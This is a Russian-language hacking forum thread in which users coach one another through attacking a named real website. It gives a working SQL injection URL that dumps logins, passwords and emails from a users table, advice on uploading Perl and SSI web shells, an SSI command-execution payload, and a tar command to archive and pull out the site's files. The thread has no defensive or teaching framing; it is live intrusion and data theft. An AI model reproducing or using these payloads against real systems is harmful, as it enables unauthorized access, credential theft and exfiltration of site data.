Вот скажи: ты любишь, когда все за тебя делают? Прочитай подпись электа =\ "Кто, если не ты сам?" (c) Elekt. Вот тебе так лень самому протестить на локалхосте? о_0
PaCo Не торопись с выводами. blind так составишь запросто, и я это описывал тут: https://forum.antichat.ru/thread104591.html Вопрос №6 И union можно, если немного подумать и потестить на локалке , попробуй
надо что-то типо: http://site.ru/index.php?id=1+procedure+analyse() Только работает оно не везде.. или у мну руки кривые=\ Вот почитай : клик
http://site.ru/index.php?id=1+procedure+analyse() Ага всё я узнал префикс...и нашёл тоблицу g_users Но также там значения видимо с префиксом... Можно ли как-то узнать эти значения? (пытался брутить то стандартному словорю SIPT4)
Не помогает... PHP: http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,5,6,7,8--+ таблички cms_config cms_group cms_news cms_users (поля gid uid) Помогите вот на счёт этого весь день и парюсь...
http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F,_login,_pass,_mail),6,7,8+from+cms_users--+ А копирайты поставить ?
Лови ++ А тогда такой вопрос... Есть шелл Но на сервере не нашёл компилятора gcc в каталогах /sbin/ и /bin/ как быть? Выполняя команду gcc Exploit.c -o Exploit ничего не происходит... И как можно слить все файлы каталога с сайтом сразу? Safe-mode: ON Архивировать по средствам c99 не удаётся... может возможно какойнить дампер на PHP залить туда? Если не сложно то какой
Byrger если ты выполняешь gcc Exploit.c -o Exploit из веб-шелла и у тебя ничего не происходит, то ответ ты написал ниже Safe-mode: ON Тебе нужен полноценный шелл, ну или хотя бы веб-шелл с нормальными правами Пробуй залить перловый шелл, например r57pws.pl Ищи в гугле
если подключен mod_include, попробуй использовать SSI, создай файл с расширением shtml, например shell.shtml с таким содержанием: Code: <!--#exec cmd="$QUERY_STRING_UNESCAPED"--> , и пользуй его, например Code: http://transsib-express.ru/path/shell.shtml?ls -lp
2Byrger попробуй: http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat а первое как сказал Iceangel_
Не получается заархивировать...может потому что файлы которые архивирую с правами на чтение? Права сменить не могу = ( они стают (1234)
права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia и если в каждой тройке будет r - значит можешь спокойно архивить. может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?
Ничего не выдаёт может из-за Safe-mode: ON Сохраняю в дирку с правами 777 любой фаил пытаюсь c99 архивировать пишет... Can't call archivator (tar cfzv archive_9f27c.tar.gz -v0x2z.jpg)! Конешно можно по 1 файлу выкачивать но это не дело...там их более 5к
